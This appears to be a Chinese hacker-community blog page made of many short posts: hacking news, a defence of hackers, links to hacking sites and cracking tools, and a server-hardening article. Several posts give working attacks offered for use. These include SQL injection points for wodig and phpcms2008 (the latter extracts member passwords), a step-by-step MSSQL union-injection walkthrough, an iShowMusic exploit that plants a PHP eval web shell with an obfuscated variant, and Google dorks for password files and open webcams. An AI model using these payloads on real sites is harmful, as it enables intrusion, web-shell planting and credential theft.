红盟

一个国人黑客联盟网站中国红盟近日发布消息将被浙江老板融资1000万元.这也是目前国内黑客网站接收到的最大融资,破纪录的达到了1千万.红盟掌门刘庆在接受采访时说红盟目前每年的营业额是5到6百万,明年预计会突破一千万.红盟的收入来源主要是服务器安全服务,目前国内很多游戏运营商和机房都是他们做的安全,特别是上海地区.另外他们还自己开发了服务器安全软件.

收藏、分享这篇文章!

别拿黑客说事

最近一段时间网上突然冒出一帮推客炒手,他们炒作的目的虽然不同但是目标无一不指向黑客,纷纷扛着洁身自好忧天下人之优的面孔对黑客指指点点一副哗众取宠的嘴脸,仿佛他骂了黑客他的人格就清高了.在他们的精彩文笔下中国的黑客好男儿们无一不被他们描述成一些专门放马盗号,揭人私隐,破坏网络友爱和上网环境等等类型的坏蛋或无法救要网络蛀虫.某些炒手甚至上升到把黑客和中国经济以及未来挂钩了,什么楼市火了要防黑客,股市火了也要防黑客,某软件火了也要防黑客,就连学生考试了还是要防黑客.更有甚者还把迈克尔杰克逊的死讯也和黑客挂上了钩,广州路由器出现问题造成网络堵塞也挂钩了,某超女退出也说是黑客爆了啥私隐.我caoTM的自从上次全国断网事件后,这些炒手们就好像抓住了救命稻草似的拼命的侮辱着黑客,明着一波接一波的带着救世主和先知的面具恶狠狠地用他们那张臭嘴ddos黑客们,暗中却又像哈巴狗一样跟在黑客后面哭爹喊娘的想学点对于他们来说就和茅山道术差不多的黑人神功,梦想着也成为其中的一员.这帮无良的东西就知道写些东西屏蔽网民的眼睛,在国家出现种种危机,当国人被侮辱的时候你们这帮杂种跑哪去了,还不是黑客提咱老百姓出头,一次次中日中美中法黑客大战一次次保家卫国难道都是你们这些无良炒手上的战场吗?事后你们有良知的还知道写个帖子啥的夸夸他们,中立的保持沉默,无良的呢甚至反咬一口说什么招来了更大的攻击波一副tm狗汉奸嘴脸,投降主义路线.今天这篇博文我是写痛快了也骂舒坦了,归根结底一句话请不要用有色的眼睛看待中国黑客,他们不过是一群有理想有技术的孤独群体,他们在大家视线的背后默默的保家卫国维护着国人和祖国的尊严维护着国内互联网的安全与稳定,他们不愿意高调不愿意出来反驳但是我们不能不明真相,不能去诬陷这么一群中国网络守护神,你想想那会多伤他们的心啊.最后也恳请占了99%的有良知的炒手多写写中国黑客的正面示例,强力反击下那些只占1%的无良炒手.我爱中国黑客我为你们自豪.

收藏、分享这篇文章!

新手黑客学习网站

这十个网站都配有入侵视频教程和详细的漏洞文章以及黑客软件,全部由浅入深,浅到基本的编程和漏洞利用,深到高级编程和漏洞挖掘.以下我一一列出这十个网站注意排名不分先后黑客动画吧:http://www.hack58.com/ 安全中国:http://www.anqn.com/ 黑鹰安全网:http://www.3800hk.com/ 华夏黑客同盟:http://www.77169.com/ 新世纪网安基地:http://www.520hack.com/ 黑客基地:http://www.hackbase.com/ 红色黑客联盟:http://www.7747.net/ 黑客防线:http://www.hacker.com.cn/ 漏洞数据库:http://www.sebug.net/ 邪恶八进制:http://www.eviloctal.com/ 暗组信息安全论坛:http://www.darkst.com/

收藏、分享这篇文章!

pangolin2.3.0.948注入工具下载

这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:http://www.nosec.org/zh-hans/pangolin_download.html

收藏、分享这篇文章!

落伍者论坛疑遭黑客入侵大量用户密码被盗

国内最大的站长聚集地落伍者论坛,今天下午突然出现大量用户密码被盗现象,经多方核查发现原来并不是落伍者主站被黑客入侵,而是因去年测试的落伍者分类信息分站被入侵,导致数百用户信息今天被披露到网上,才引发的今日大量用户密码被盗现象.目前落伍的站长拒绝游泳的鱼已经发布广告,被盗用户可以联系QQ:288753恢复密码.积分损失可找小瑜补偿,落伍公告地址:http://www.im286.com/thread-3563529-1-1.html

收藏、分享这篇文章!

wodig注入漏洞

wodig漏洞文件Default.asp?tags_name=a’

article.asp?Src_Child=1&Src_ChildSub=a’

wodig.asp?tags_name=a’这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络

收藏、分享这篇文章!

YingCracker

中国黑客有很多但是要说到美女黑客恐怕只有这么一位,YingCracker上海姑娘一位靠带徒弟,卖0day的职业黑客.有黑客界的朋友爆料说拜师YingCracker门下需要4千元到8千元不等.YingCracker不仅人长的漂亮而且技术也绝不比男性黑客差,尤其是交友广泛,手里的0day数不胜数.让一帮小黑fans们羡慕的直流口水.在这里祝愿国内新一代黑客早日成长,更希望能多出几个YingCracker这样的有技术有身材有相貌的美女黑客.

YingCracker

YingCracker

YingCracker

YingCracker

收藏、分享这篇文章!

sebug漏洞搜索

SEBUG很早就知道了这个网站,也是国内黑客常去的网站,它的信息来源之广,漏洞信息量之大在国内无出其右,虽然是国人办的网站,但是对中文搜索的支持确不是很好,比如你要搜索某个cms漏洞你要是打cms的中文名是搜不到的,只能输入cms的英文名搜索.希望sebug的站长能改进一下.网址:http://www.sebug.net

收藏、分享这篇文章!

live search IP命令搜索同ip网站

以前大家找同IP网站都是用现成的网站查询,p9以前也介绍过很多这种网站比如IP邻居还有<介绍几个同ip地址反查域名的网站>等几篇文章.今天给大家介绍的是直接利用live search搜索引擎的IP搜索命令来查询同ip网站也就是ip反查域名,利用这种方法查询不仅能知道服务器上到底有多少网站还能知道有多少个网页.用法很简单直接打开live search网站http://www.live.com/在搜索框里输入IP:你要查询的ip.实例ip:127.0.0.1这个方法也被黑客常用作跨站攻击

收藏、分享这篇文章!

收藏、分享这篇文章!

PHP手工注入使用

比如黑客找到注入点是:http://www.xxx.tk/news.php?id=300数据库类型是mssql2005.要用union查询,先确定有几个字段，使用order by 来完成，就是:http://www.xxx.tk/news.php?id=300 order by 7– 回显正常
http://www.xxx.tk/news.php?id=300 order by 8– 回显失败
说明总共7个字段，然后用null填充
http://www.xxx.tk/news.php?id=300 union all select null,null,null,null,null,null,null–显示正常
变换成不存在的id,前面加负号,或者加上and 1=2的条件,比如
http://www.xxx.tk/news.php?id=99999 union all select null,null,null,null,null,null,null–
确定下哪个位置可以爆出结果，先从第一个null开始变换，直接替换成user,就是:
http://www.xxx.tk/news.php?id=99999 union all select user,null,null,null,null,null,null–
看来运气比较好，当前用户名直接出现在某个可见的位置，要是没显示结果就继续变换位置
那就从这个位置开始暴出我们想要的结果
1.变换id获得库名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+master.dbo.sysdatabases+where+dbid=1–
2.获得当前库名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select db_name(),null,null,null,null,null,null–
3.获得当前版本
http://www.xxx.tk/news.php?id=300 and 1=2 union all select @@version,null,null,null,null,null,null–
4.变换N获得指定库的表名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select name,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and name not in (select top N name from BugTracker.dbo.sysobjects where xtype=CHAR(85))–
5.获得指定库所有列名
(1) 这里的M和获得库名时的N必须一致，不然无法得到正确的库名ID
http://www.xxx.tk/news.php?id=300 and 1=2 union all select ID,null,null,null,null,null,null+from+BugTracker.dbo.sysobjects+where xtype=CHAR(85) and ID not in (select top M ID from BugTracker.dbo.sysobjects where xtype=CHAR(85))–
(2)最后的ID值即是(1)中回显的数值,通过变换N值获得所有列名
http://www.xxx.tk/news.php?id=300 and 1=2 union all select NAME,null,null,null,null,null,null from BugTracker.dbo.syscolumns where ID=53575229 and name not in (select top N name from BugTracker.dbo.syscolumns where ID=53575229)–
6.根据前几步所得结果获得字段内容
http://www.xxx.tk/news.php?id=300 and 1=2 union all select bug_id,null,null,null,null,null,null from BugTracker..mantis_bug_file_table–可自加条件进行查询

收藏、分享这篇文章!

IP邻居

IP反查域名的网站我介绍了很多,而且还根据效果做了排名.今天给大家介绍的IP邻居这个网站不仅反查量大,而且还显示同IP站点的PR值,百度和谷歌的收录量.目前国内IP反查域名站点在数据量和功能上无出其右,国外站点的速度又不敢恭维.所以P9强烈推荐大家使用IP邻居反查域名.网址:http://www.iplinju.com/更多IP反查域名站点请参看介绍几个同ip地址反查域名的网站这篇日志.

收藏、分享这篇文章!

新的md5密码破解站

随着cmd5.com的部分md5密码破解收费,p9就致力于寻找新的md5密码破解站,今天这个是具有120G数据的md5破解新站http://www.t00ls.net/tools/md5/其它免费md5破解站请参看md5破解收费了咋办这篇博文!

收藏、分享这篇文章!

google突破搜索

在搜索框上输入： “index of/ ” 　inurl:lib
再按搜索你将进入许多图书馆，并且一定能下载自己喜欢的书籍。
在搜索框上输入： “index of /” 　cnki
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口！
在搜索框上输入：　“index of /” 　ppt
再按搜索你就可以突破网站入口下载powerpint作品！
在搜索框上输入： “index of /” 　mp3
再按搜索你就可以突破网站入口下载mp3、rm等影视作品！
在搜索框上输入：　“index of /” .s**
再按搜索你就可以突破网站入口下载flash作品！
在搜索框上输入： “index of /” 　要下载的软件名
再按搜索你就可以突破网站入口下载软件！
注意引号应是英文的！
再透露一下，如果你输入：
“index of /” 　AVI
另补上第二篇
用GOOgle看世界!!!只要你在GOOGLE里输入特殊的关键字,就可以搜到数千个摄象头的IP地址!通过他你就可以看到其所摄的实时影象!!
在google里输入
inurl:”viewerframe?mode=”
随便打开一个,然后按提示装一个插件,就可以看到了!!!
再补上第三篇
三则黑客的Google搜索技巧简介
大家都知道，Google毫无疑问是当今世界上最强大的搜索引擎。然而，在黑客手中，它也是一个秘密武器，它能搜索到一些你意想不到的信息。赛迪编者把他们进行了简单的总结不是希望您利用他去攻击别人的网站，而是利用这些技巧去在浩如烟海的网络信息中，来个大海捞针，寻找到对您有用的信息。
如果您是一名普通网民，您可以使用黑客的技巧扩大自己的视野，提高自己的检索效率；如果您是一名网管，请您赶快看看您的网站是否做好了对下面黑客探测手段的防范措施，如果没有就赶快来个亡羊补牢，毕竟隐患胜于明火，防范胜于救灾；如果您是一名黑客，相信您早以在别的黑客站点上见过类似的方法，这篇文章对您没什么用处，这里的技巧对您是小儿科，菜鸟级！您可以节省宝贵的时间做更有意义的事情，这篇文章您不用看了，到别处去吧！
基于上面的考虑我编发了这篇文章。
搜索URL
比如我们提交这种形式：passwd.txt site:virtualave.net
看到了什么？是不是觉得太不可思议了！有很多基于CGI/PHP/ASP 类型的留言板存在这种问题。有时我们得到密码甚至还是明码的！管理员或许太不负责了，或许安全防范的意识太差了，如果你是网络管理员，赶快检查一下不要让恶意攻击者捡了便宜。不要太相信DES加密，即使我们的密码经过DES 加密的密码，黑客们还是可以通过许多破解软件来搞定。
这次我们能得到包含密码的文件。“site:virtualave.net”意思是只搜索 virutalave.net 的URL。virutalave.net是一个网络服务器提供商。
同样，我们可以搜索一些顶级域名，比如：.net .org .jp .in .gr
config.txt site:.jp
admin.txt site:.tw
搜索首页的目录
首页是非常有用的，它会提供给你许多有用的信息。
我们提交如下的形式：
“Index of /admin”
“Index of /secret”
“Index of /cgi-bin” site:.edu
你可以自己定义搜索的首页字符。这样就可以获得许多信息。
搜索特定的文件类型
比如你想指定一种文件的类型，可以提交如下形式：
file无效:.doc site:.mil classified
这个就是搜索军方的资料，你可以自定义搜索。
再提供一个第四篇
Google 的特殊功能
1 、查询电话号码
Google 的搜索栏中最新加入了电话号码和美国街区地址的查询信息。
个人如想查找这些列表，只要填写姓名，城市和省份。
如果该信息为众人所知，你就会在搜索结果页面的最上方看到搜索的电话和街区地址
你还可以通过以下任何一种方法找到该列表：
名字（或首位大写字母），姓，电话地区号
名字（或首位大写字母），姓，邮递区号
名字（或首位大写字母），姓，城市（可写州）
名字（或首位大写字母），姓，州
电话号码，包括区号
名字，城市，州
名字，邮递区号
2 、查找 PDF 文件
现在 GOOGLE 的搜索结果中包括了 PDF 文件。尽管 PDF 文件不如 HTML 文件那么多，但他们经常具备一些其他文件不具备的高质量信息
为了显示一个搜索结果是 PDF 文件而不是网页， PDF 文件的标题开头显示蓝色文本。
这就是让你知道 ACRTOBAT READER 程序会启动来阅读文件
如果你的计算机没装有该程序，计算机会指导你去能免费下载该程序的网页。
使用 PDF 文件时，相关的网页快照会由“ TEXT VERSION ”代替，它是 PDF 文档的复制文件，该文件除去了所有格式化命令。
如果你在没有 PDF 链接的情况下想看一系列搜索结果，只要在搜索栏中打上 -inurldf 加上你的搜索条件。
3 、股票报价
用 Google 查找股票和共有基金信息，只要输入一个或多个 NYSE ， NASDAQ ， AMEX 或
共有基金的股票行情自动收录机的代码，也可以输入在股市开户的公司名字。
如果 Google 识别出你查询的是股票或者共有基金，它回复的链接会直接连到高质量的金融信息提供者提供的股票和共有基金信息。
在你搜索结果的开头显示的是你查询的股市行情自动收录器的代码。如果你要查找一家公司的名字（比如， INTEL ），请查看“股票报价”在 Google 搜索结果的金融栏里会有那个公司的主页的链接（比如， WWW.INTEL.COM ）。
Google 是以质量为基础来选择和决定金融信息提供者的，包括的因素有下载速度，用户界面及其功能。
4 、找找谁和你链接
有些单词如果带有冒号就会有特殊的意思。比如 link ：操作员。查询 link:siteURL ，就会显示所有指向那个 URL 的网页。举例来说，链接 www.Google.com 会向你显示所有指向 GOOGLE 主页的网页。但这种方法不能与关键字查询联合使用。
5 、查找站点
单词 site 后面如果接上冒号就能够将你的搜索限定到某个网站。具体做法是：在 c 搜索栏中使用 site:sampledomain.com 这个语法结构。比如，在斯坦福找申请信息，输入：
admission site:www.stanford.edu
6 、查找字典释意
查找字典释意的方法是在搜索栏中输入你要查询的内容。在我们根据要求找到所有的字典释意都会标有下划线，位于搜索结果的上面，点击链接你会找到字典提供者根据要求给出的相关定义。 7 、用 GOOLGE 查找地图
想用 Google 查找街区地图，在 Google 搜索栏中输入美国街区地址，包括邮递区号或城市 / 州（比如 165 大学大街 PALO ALTO CA ）。通常情况下，街区地址和城市的名字就足够了。
当 Google 识别你的要求是查找地图，它会反馈给你有高质量地图提供者提供的链接，使你直接找到相关地图。我们是以质量为基础选择这些地图提供者。值得注意的是 Google 和使用的地图信息提供者没有任何关联。
■ 标题搜索
　多数搜索引擎都支持针对网页标题的搜索，命令是“title:”，在Yahoo中是“t:”（注意冒号为英文字符且后面不跟空格）。在进行标题搜索时，前面提到的逻辑符号和精确匹配原则同样适用。请看下面的例子：
· title（或t）:computer adventure games
· title:+computer +adventure +games
· title:+computer +games -adventure
· title:”computer adventure games”
返回的结果都是标题中包含关键字、词的信息条目。

■ 网站搜索
　此外我们还可以针对网站进行搜索，命令是“site:”（Google）、“host:”（AltaVista）、“url:”（Infoseek）或“domain:”（HotBot）。如想查找AAA游戏制作公司网站的所有网页，可以输入：· site(或host/url/domain):www.AAA.com
还可以在其中加入其他命令组成复杂的搜索条件，如：· site:www.AAA.com +title:”computer games” -adventure
意思是查找AAA公司网站中所有标题里含有computer games的网页，但排除关于冒险游戏的网页。
说到这里大家可能已经意识到了，运用此命令我们可以达到一个极其重要的目的，就是检查我们的网站被索引的网页有多少。因此建议大家牢记这个命令。另外运用“site/host/url/domain”等搜索命令还可实现某一网站的站内搜索。比如Google引擎由于技术的先进性，通过其“site”命令实现的网站内部搜索甚至比专门的站内搜索程序还要好。

■ 链接搜索
　在Google和AltaVista中，用户均可通过“link:”命令来查找某网站的外部导入链接（inbound links）。如：· link:www.AAA.com
其他一些引擎也有同样的功能，只不过命令格式稍有区别。你可以用这个命令来查看是谁以及有多少网站与你做了链接。
除上述命令外，还有其他一些特殊搜索命令，如“filetype:”（限定搜索的文档类别）、“daterange:”（限定搜索的时间范围）、“phonebook:”（查询电话）等等，感兴趣的话大家可以自己研究一下。Google引擎提供了比较完备的搜索功能，具体可参考Google从入门到精通专题介绍。

收藏、分享这篇文章!

http://www.hashchecker.com/?_sls=search_hash

http://md5.rednoize.com/

最后一个比较特殊它是在线暴露破解的http://www.milw0rm.com/md5/info.php

收藏、分享这篇文章!

波波虎网络家庭影院被黑

网上流行的波波虎家庭影院服务器遭黑客攻击截止目前仍然没有恢复,波波虎官方发布消息说4月4日下午也就是今天下午5点恢复.本站也有介绍波波虎家庭影院想下载波波虎的请点这里

收藏、分享这篇文章!

　一、所有主机可以Telnet到服务器。

由于服务器往往都放在一个特定的空间中，若对于服务器的任何维护工作，如查看服务器的硬盘空间等等，这些工作都需要到服务器上面去查看的话，很明显不是很

服务器常见安全管理漏洞

方便。我们希望能够在我们平时用的电脑上就可以对服务器进行一些日常的维护，而不用跑到存放服务器的房间中去。

所以，我们对于服务器的大部分维护工作，都可以通过Telnet到服务器上，以命令行的方式进行维护。这无疑为我们服务器的管理提供了一个方便的管理渠道，但是，也给服务器带来了一些隐患。

当非法攻击者利用某些特定的方法知道Telent的用户名与密码之后，就可以在企业任何一台主机上畅通无阻的访问服务器。特别是当一些心怀不满的员工，更容易借此发泄自己对企业的不满。以前我有个朋友在一家软件公司中当CIO，有个员工乘管理员不注意的时候，取得了文件服务器的Telent用户名与密码。后来因为其泄露客户的机密信息而被公司警告处分。这个员工心怀不满，就利用窃取过来的用户名与密码，登陆到文件服务器，删除了很多文件。还好，在文件服务器中采取了比较完善的备份制度，才避免了重大的损失。

所以，Telent技术为我们服务器管理提供了比较方便的手段，但是，其安全风险也不容忽视。一般来说，对于Telent技术，我们需要注意以下几个方面。

一是Telent用户名与密码跟服务器的管理员登陆用户名与密码最好不一样。也就是说，在服务器主机上登陆的用户名与密码，与远程Telent到服务器的管理员用户名与密码要不一样。如此的话，可以把用户名与密码泄露对服务器的危害降到最低。

二是最好能够限制Telent到服务器的用户主机。如我们可以在服务器上进行限制，只允许网络管理员的主机才可以远程Telent到服务器上去。这实现起来也比较简单。若是微软服务器系统的话，可以利用其本身自带的安全策略工具实现。或者可以借助防火墙来限制Telent到服务器上的IP地址或者MAC地址。如此的话，即使用户名或者密码泄露，由于有了IP地址或者MAC地址的限制，则其他人仍然无法登陆到服务器上去。如此的话，就可以最大限度的保障只有合法的人员才可以Telent到服务器上进行日常的维护工作。

三是若平时不用Telent到服务器管理的话，则把这个Telent服务关闭掉。没有必要为攻击者留下一个后门。

二、服务器的上的共享文件家所有用户都有访问权限。 在应用服务器上，我们有时会为了维护的方便，会在上面建立几个共享文件夹。但是，若这些共享文件夹管理不当，也会给应用服务器带来比较大的安全隐患。 如若我们某个共享文件夹设置所有用户都可以无限制的进行访问的话，则会出现一个问题，当网络中若有病毒的话，这些文件夹就很容易被感染。当我们在服务器上不小心打开这些共享文件夹的时候，服务器就会感染病毒，甚至会导致服务器当机。 所以，在服务器上设置共享文件夹的时候需要特别的注意，因为服务器崩溃后，对于企业的信息化应用来说，是致命的。一般情况下，不要在应用服务器上设置共享文件夹。若一定要的话，则也需要遵循如下的安全原则。

一是用好以后需要及时把文件加设置为不共享。当我们因为某种需要建立一个临时的共享文件夹时，当我们用完之后，需要及时把这个共享文件夹删除掉，或者改为不共享。及时清理共享文件夹，使保护共享文件夹安全的不二法则。

二是为共享文件夹设置最小权限。平时在设置共享文件夹的时候，我们可能系习惯了不设置访问权限，所以员工都可以不受限制的访问共享文件夹。但是，若在文件服务器上面设置共享文件夹的时候，一定需要注意，在设置共享的时候，就需要设置访问的用户，最好只有特定的用户才可以访问这个共享文件夹，特别是读写权限需要严格控制。有些人可能会以为我只是暂时共享一下，中间不超过十分钟。可是，若网络中有病毒的话，则会自需要一秒钟的时间就可以感染共享文件夹。故在服务器管理的时候，不能够有这种侥幸心理。

三、没有关闭不必要的服务。

在服务器操作系统安装的时候，会装了比较多的服务。如我们在安装文件服务器系统的话，默认情况下，可能会开启WWW服务、Telent服务、DSN服务等等。但是，对于文件服务器来说，这些服务往往是没有必要的。我们在应用服务器上开启了这些不必要的服务，不但会占用可贵的硬件资源，而且，最重要的是，会降低文件服务器的安全性。

所以，笔者建议，在服务器管理的时候，把一些没有必要的服务关闭掉。

若采用的是微软的服务器操作系统，我们可以通过开始、设置、控制面板、管理工具、服务来查看当前操作系统所开启的服务。如一般情况下，我们可以把如下的一些服务关闭掉。

一是DHCP客户端。由于应用服务器我们一般都采用固定的IP地址，所以可以把这个DHCP客户端关闭掉，禁止服务器从DHCP服务器那边获取IP地址。这可以有效的防治IP地址的冲突，从而造成服务器断网。

二是要注意Ping 攻击。利用Ping命令来对应用服务器实施拒绝服务式攻击是很多攻击者常用的一个手段。其基本原理就是利用肉鸡同时连续的Ping应用服务器，从而导致应用服务器资源耗竭而当机。所以，一般情况下，需要在文件服务器上，设置“禁止他人Ping自己”，如此的话，就可以杜绝DDOS等恶性攻击。

三是可以关闭Remote Desktop Help Session Manager服务。这个服务主要用来管理并控制远程协助。如果此服务被终止的话，远程协助将不可用。若我们平时不用远程桌面连接等工具远程维护这个应用服务器的话，则可以直接把这个服务关闭掉。默认情况下，这个服务需要手工启动。我们为了安全起见，可以把这个服务禁用。

三是自动更新服务。这是一个有争议的服务。若启用了这个服务的话，则应用服务器操作系统可以自动从网络上升级最新的操作系统补丁，提高操作系统的安全性。但是，有时候当装了微软的升级补丁后，服务器反而不稳定了，有时候甚至导致部属在上面的应用服务器无法使用。故笔者的建议是，若你在应用服务器上部属的都是微软的产品，如微软的邮箱服务器等等，则可以打开这个自动更新服务。若你在他们的服务器操作系统上，部署了其他牌子的邮箱服务器，或者部署了一些其他牌子的数据库系统的话，则是否开启这个自动更新服务，则要慎重考虑了。

四、不同管理人员利用同一个账户管理服务器。

有时候，在一个服务器上可能会部署多个应用，如在一台应用服务器中，可能既是邮箱服务器，又是文件服务器。而不同的应用有不同的管理员负责。有些企业为了管理的方便，可能会利用同一个用户名来管理不同的服务。笔者认为，这是不安全的。

当某个管理员在一个应用服务管理的时候，有可能会不小心更改另外一个服务的配置，而此时，另外一个管理员并不知情。如此的话，就可能会导致另外一个服务出现运行上的错误。所以，这就会给服务器管理产生安全上的漏洞。

为此，笔者建议，最好是一个服务采用一台服务器，虽然这需要增加一定的支出，但是，一台服务器出现问题的话，最多只影响一个应用，可以把因为服务器的问题造成的不良影响降至到最低。

若出于成本的限制的话，确实需要在不同的服务器中部署不同的服务的话，则最好在安装服务的时候，就先建立不同的管理员帐户，然后利用对应的帐户登陆再部署相关的服务。如此的话，就可以最大限度的减少管理员之间的相互干扰。即使是同一个管理员管理不同的服务，最好也是建立不同的帐户为妙。

收藏、分享这篇文章!

myipneighbors

今天偶然在打开myipneighbors的时候发现ip反查域名恢复服务了,期盼了好几个月终于等到myipneighbors恢复了,我试着查了一下发现功能没以前缺少了一些.这个网站我在3月7号的介绍几个同ip地址反查域名的网站这篇文章中介绍过.

收藏、分享这篇文章!

安全

iShowMusic在error.php 12-26行复制内容到剪贴板代码:
elseif ($_POST['action']==”save”){
$cknumon && GdConfirm($gdcode);
if(empty($id)) {
Showmsg(“no”,”你还未选择歌曲呢!”,”返回重新填写”,”javascript:history.back(-1)”); exit;}
elseif(empty($_POST['user'])) {
Showmsg(“no”,”你还没写名字呢!”,”返回重新填写”,”javascript:history.back(-1)”); exit;}
else{
$user=safeconvert($user);
$line=”$user|$songname|$id|$errmsg|$timestamp|\n”;
$e=”$datadir/error.php”;
writetofile($e,$line,”a+”);
Showmsg(“yes”,”提交成功，谢谢您的支持！”,”关闭本页”,”javascript:window.close()”); exit;
}在global.php 27-34行复制内容到剪贴板代码:
foreach($_POST as $_key=>$_value){
$_POST[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_POST[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];
}
foreach($_GET as $_key=>$_value){
$_GET[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_GET[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];
}这段代码是允许在register_globals在off的情况下工作
程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.
导致失去了这段代码本来的作用.

function writetofile($file_name, $data, $method = “w”)
{
$filenum = fopen($file_name, $method);
flock($filenum, LOCK_EX);
$file_data = fwrite($filenum, $data);
fclose($filenum);
return $file_data;
}

这个函数也没有任何过滤就把$data写进去了,呵呵

hxxp://www.xxx.com/error.php?errid=1&errtitle=<?eval($_POST[wst]);?>

然后提交一下你就能获得一个shell在

hxxp://www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文

件夹改名,呵呵)

刚经群里的朋友提示,发现这段代码并没有错误复制内容到剪贴板代码:
foreach($_POST as $_key=>$_value){
$_POST[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_POST[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];
}
foreach($_GET as $_key=>$_value){
$_GET[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_GET[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];
}呵呵..虽然我在本地本地测试的时候确实没替换.
现在修改哈Ryat提供的邪恶的shellcode..嘿嘿
hxxp://www.xxx.com/error.php?errid=1&errtitle=<?fputs(fopen(chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59).chr(63).chr(62));?>
这样你在访问一次hxxp://www.xxx.com/data/error.php后将得到hxxp://www.xxx.com/data/wolvez.php的测试文件
内容为<?phpinfo():?>lol

收藏、分享这篇文章!

安全

作者：nuke
受影响程序： phpcms2008 gbk
漏洞文件：ask/search_ajax.php
测试方法：
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23

收藏、分享这篇文章!